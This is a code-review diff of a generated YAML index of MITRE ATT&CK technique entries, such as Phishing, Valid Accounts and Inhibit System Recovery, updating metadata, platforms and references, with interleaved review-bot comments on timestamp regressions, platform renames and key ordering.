- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -65124,7 +66058,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -65151,7 +66085,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -65201,13 +66135,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests:
- name: Disable Time Machine
@@ -65289,11 +66222,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
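Review bot: the `modified` timestamp for T1529 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-03-22T20:45:22.531Z`; the same regression appears for T1133 (`2023-05-09` to `2023-03-30`) and T1195.003 (`2022-05-24` to `2022-04-28`) later in this diff. Every other technique here moves forward to a 2024 date. A regressing `modified` value usually means the two exports were taken from bundles with different re-basing of timestamps, so anything that uses `modified` to decide whether a technique needs re-syncing will treat these three as stale. Please note the source bundle version in the PR description so the change is traceable.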
@@ -65358,7 +66290,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests:
- name: Restart System via `shutdown` - FreeBSD/macOS/Linux
@@ -65416,7 +66347,7 @@ impact:
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -65494,7 +66425,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -65544,11 +66474,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -65587,10 +66516,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
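Review bot: the platform rename in this hunk (`Office 365` and `Google Workspace` removed, `Identity Provider` and `Office Suite` added, version 2.6 to 2.7) is the upstream ATT&CK platform consolidation, and the same substitution is repeated for T1078.001, T1199 and T1566 below. Anything in this repository that keys on the old platform strings, such as per-platform index generation or filters that match `Google Workspace` or `Office 365`, will silently yield empty results after this change, so that code and its generated outputs should be updated in the same PR, or the PR description should explain why they are unaffected.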
@@ -65607,7 +66536,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -65646,12 +66575,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -65713,7 +66641,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -65730,7 +66658,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -65760,7 +66687,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -65774,7 +66701,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -65837,12 +66763,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -65917,7 +66842,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -65931,19 +66856,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -65969,7 +66893,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -66024,7 +66948,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -66087,11 +67010,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -66106,6 +67028,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -66114,18 +67037,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -66157,9 +67080,6 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest Account on macOS
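Review bot: the key order emitted for T1078.001 differs from the order used for the other techniques in this diff. Here `x_mitre_attack_spec_version` is inserted after `kill_chain_phases` and `x_mitre_modified_by_ref` after `x_mitre_is_subtechnique`, with the old copies at the bottom removed (`- x_mitre_attack_spec_version: 3.2.0`, `- x_mitre_modified_by_ref: ...`), whereas T1565.002 and T1498 keep both keys after `object_marking_refs`. The content is identical either way, but an unstable key order turns every regeneration into a large move-only diff that hides the real changes (here: the platform rename and the 1.3 to 1.4 bump). Consider having the generator sort keys or preserve upstream order consistently so future diffs show only semantic changes.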
@@ -66175,7 +67095,7 @@ initial-access:
elevation_required: true
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -66186,6 +67106,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -66194,22 +67119,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -66234,36 +67155,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
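Review bot: the rewritten T1566 description introduces a new citation key, `(Citation: phishing-krebs)`, which only resolves if this same object's `external_references` gains an entry with `source_name: phishing-krebs`; check that the reference is present before merging. The carried-over key `sygnia Luna Month` (sitting next to `Unit42 Luna Moth`) looks like an upstream typo for "Luna Moth", but citation keys are matched literally against `source_name`, so leave it exactly as ATT&CK publishes it rather than correcting one side.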
@@ -66292,9 +67196,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
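Review bot: this hunk drops the literal platform values `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider`, yet the per-platform index files in this diff keep their old names (office-365-index.yaml further down). If the index generator maps platform strings to output files by name, that mapping needs updating to the new values, otherwise the old-named indexes stop matching any technique without any error.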
@@ -66312,7 +67216,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
@@ -66350,11 +67258,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
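Review bot: `spec_version: '2.1'` is removed from the T1566 object here with nothing replacing it, and the same deletion repeats in every technique object in this diff. `spec_version` is a required property on STIX 2.1 domain objects, so anything that validates these entries as STIX, or compares them against the upstream bundle, will now fail. If the index is meant to be a flattened, non-STIX view, say so in the PR description.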
@@ -66371,7 +67278,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -66381,7 +67287,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -66390,19 +67296,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -66450,11 +67354,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
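Review bot: the unchanged T1566.004 description line reads `in that is employs the use of`, an upstream wording error (`it employs`). Because this file is generated from the ATT&CK bundle, report it upstream instead of hand-editing the index, or the fix will be lost on the next regeneration.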
@@ -66474,10 +67379,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
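Review bot: this hunk removes `SaaS` from T1566.004's platforms together with `Office 365` and `Google Workspace` and adds only `Identity Provider`, whereas the other techniques in this diff keep `SaaS` when they gain `Office Suite` or `Identity Provider`. That may well be correct for Spearphishing Voice, but a spot check against the upstream object would rule out a mapping slip in the generator.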
@@ -66510,7 +67413,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -66549,7 +67451,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
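Review bot: `modified` moves backwards here (2022-05-24 to 2022-04-28), and the same happens in a number of later hunks; the old values share a synthetic-looking `T14:00:00.188Z` pattern, so the previous index appears to have been built from a source with rewritten timestamps and this one from the upstream bundle. That is fine, but anything that uses `modified` to decide whether an entry is stale should be checked, and the PR description should state which STIX source the generator now reads.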
@@ -66564,7 +67466,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -66644,11 +67545,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -66704,11 +67604,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -66769,8 +67668,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
@@ -66798,13 +67697,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
